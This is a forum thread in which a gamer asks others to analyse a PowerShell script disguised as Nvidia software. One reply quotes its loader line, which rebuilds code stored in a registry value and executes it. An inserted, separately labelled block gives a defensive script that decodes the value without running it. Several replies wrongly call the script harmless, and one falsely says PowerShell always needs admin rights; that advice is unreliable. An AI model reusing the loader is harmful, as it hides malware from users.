Can anyone analyze this script...

Halbour

OP
It's the one that caused me problems - just found out. I edited it, and in that single line of code, it says it's from Nvidia. That and 3 more are randomly appearing, showing in the Task Manager, and doing nothing except wasting RAM.
I hope.
VirusTotal and my antivirus (Bitdefender, it's a good one) are saying it's totally fine, but I think it's not really - it even appears in the middle of games! Here is the file for someone good at this stuff. I'm not good enough.
Here is the file. It was .ps1, but I converted it to txt.
 

Attachments

  • 15EEF3A6-E215-43A2-8C70-9ADAF0719062.txt
    205 bytes · Views: 106

Halbour

OP
IDK, it just shows 4 PS windows that disappear after a few seconds... and take RAM in the Task Manager. Nothing else. But... it's really annoying, to know that the control on my PC isn't mine... and when it decides to show up in the middle of a game - I'm straight up screwed... annoyingly jumps in the middle of my Spider-swings..
Post automatically merged:

You should be fine, there seems to be nothing too malicious about it. Don't know what it does though I'm afraid.
Thank you for answering, though...!
 

sombrerosonic

It's the one that caused me problems - just found out. I edited it, and in that single line of code, it says it's from Nvidia. That and 3 more are randomly appearing, showing in the Task Manager, and doing nothing except wasting RAM.
I hope.
VirusTotal and my antivirus (Bitdefender, it's a good one) are saying it's totally fine, but I think it's not really - it even appears in the middle of games! Here is the file for someone good at this stuff. I'm not good enough.
Here is the file. It was .ps1, but I converted it to txt.
Try deleting it, then deep scan your PC. The PS1 script seems not to be malicious; however, better safe than sorry.
 

JaapDaniels

There doesn't seem to be anything wrong... it looks to be a graphics settings parser towards Nvidia through the settings in registry Computer\HKEY_LOCAL_MACHINE\SOFTWARE\NVIDIA Corporation
I think the global settings will be temporarily overwritten, for the writer of the script didn't know how else to change those settings.
 

Halbour

OP
There doesn't seem to be anything wrong... it looks to be a graphics settings parser towards Nvidia through the settings in registry Computer\HKEY_LOCAL_MACHINE\SOFTWARE\NVIDIA Corporation
I think the global settings will be temporarily overwritten, for the writer of the script didn't know how else to change those settings.
And in English..?
 

JaapDaniels

And in English..?
$variable1=[ScriptBlock]
$variable2=[string]
$variable3=[char]
icm ($variable1::Create($variable2::Join('', ((gp 'HKLM:\SOFTWARE\NVIDIA CorporationNVf6Cb').'VDzb5hT6' | % { [char]$_ })))).
HKLM:\SOFTWARE\NVIDIA Corporation = registry Computer\HKEY_LOCAL_MACHINE\SOFTWARE\NVIDIA Corporation.
I'm not 100% sure what the variables do from icm till gp, but it looks to be legit for a 3D emulator to write to the GPU, interpret $variable1 fixed location or so within the PS1 as overall being ScriptBlock (naming it this way may help to keep the code easy to read)... the same goes for string and char.
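
Added example, not part of any post in this thread: the one-liner quoted above reads the named value with `gp` (Get-ItemProperty), casts each element to `[char]`, joins the result into a string, builds a script block from it and runs it with `icm` (Invoke-Command), so the code that actually executes is stored in the registry rather than in the .ps1. The sketch below decodes that value to a text file for reading instead of running it, and lists scheduled tasks that start PowerShell; `ConvertTo-PayloadText`, `$OutFile` and the pattern list are illustrative names and choices, and the key path and value name are copied as they appear in the post.

```powershell
# Added example: decode the registry-stored payload to a text file WITHOUT running it.
# Save as a .ps1 and run it from a normal (non-elevated) PowerShell prompt.
param(
    # Copied as they appear in the post above; use the values from your own copy of the script.
    [string]$KeyPath   = 'HKLM:\SOFTWARE\NVIDIA CorporationNVf6Cb',
    [string]$ValueName = 'VDzb5hT6',
    [string]$OutFile   = (Join-Path $env:TEMP 'decoded_payload.txt')  # hypothetical output path
)

function ConvertTo-PayloadText {
    # Same decoding as the one-liner ([char] per element, joined into one string),
    # but the result is only returned, never handed to [ScriptBlock]::Create or icm.
    param($Raw)
    if ($Raw -is [string]) { return $Raw }
    return -join ($Raw | ForEach-Object { [char][int]$_ })
}

$prop = Get-ItemProperty -LiteralPath $KeyPath -Name $ValueName -ErrorAction SilentlyContinue
if ($null -eq $prop) {
    Write-Warning "Value '$ValueName' not found under '$KeyPath'"
    return
}

$text = ConvertTo-PayloadText -Raw $prop.$ValueName
Set-Content -LiteralPath $OutFile -Value $text -Encoding UTF8
"Decoded {0} characters to {1}" -f $text.Length, $OutFile

# Constructs worth reading closely in the decoded text (a triage list, not a verdict).
$patterns = 'Invoke-Expression|\biex\b|FromBase64String|DownloadString|Net\.WebClient|Start-Process|ScriptBlock'
Select-String -LiteralPath $OutFile -Pattern $patterns |
    Select-Object LineNumber, Line | Format-Table -AutoSize -Wrap

# Something has to start the .ps1 each time: list scheduled tasks that launch PowerShell.
Get-ScheduledTask | ForEach-Object {
    foreach ($action in $_.Actions) {
        if ($action.Execute -match 'powershell|pwsh') {
            [pscustomobject]@{
                Task      = $_.TaskPath + $_.TaskName
                Execute   = $action.Execute
                Arguments = $action.Arguments
            }
        }
    }
} | Format-List
```

The decoded file is plain text and is only written to disk; open it in an editor rather than a PowerShell session.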
 

JaapDaniels

Wait a minute, I misread the first part. You mean it's a PowerShell script!
For this is mostly console/emulators related, I was reading PlayStation 1. PowerShell scripts are scripts I'm not sure I'd run outside a bottle if I didn't write it myself and understood the code.
Though this part looks harmless, it runs in elevated privileges.
You should not try someone else's Powerscript unless you're damn sure what it is.
It could very well be a coin mining application, which takes about all unused resources of your computer to mine shit coins for someone else.
 

Halbour

OP
Wait a minute, I misread the first part. You mean it's a PowerShell script!
For this is mostly console/emulators related, I was reading PlayStation 1. PowerShell scripts are scripts I'm not sure I'd run outside a bottle if I didn't write it myself and understood the code.
Though this part looks harmless, it runs in elevated privileges.
You should not try someone else's Powerscript unless you're damn sure what it is.
It could very well be a coin mining application, which takes about all unused resources of your computer to mine shit coins for someone else.
The thing is, I never got this script from someone...
 

JaapDaniels

I've got the update of the latest driver and it's not the driver or related tools of Nvidia.
PowerShell is fine if you're writing it for yourself.
PowerShell has got lots of great options.
But PowerShell demands admin mode, even when not strictly needed for the task you give it...
Most of PowerShell's options can be done in Python with pip modules without admin rights...
That's far more safe.
 

SylverReZ

I've got the update of the latest driver and it's not the driver or related tools of Nvidia.
PowerShell is fine if you're writing it for yourself.
PowerShell has got lots of great options.
But PowerShell demands admin mode, even when not strictly needed for the task you give it...
Most of PowerShell's options can be done in Python with pip modules without admin rights...
That's far more safe.
I'm still using the good ol' Command Prompt and Terminal for everything.
 
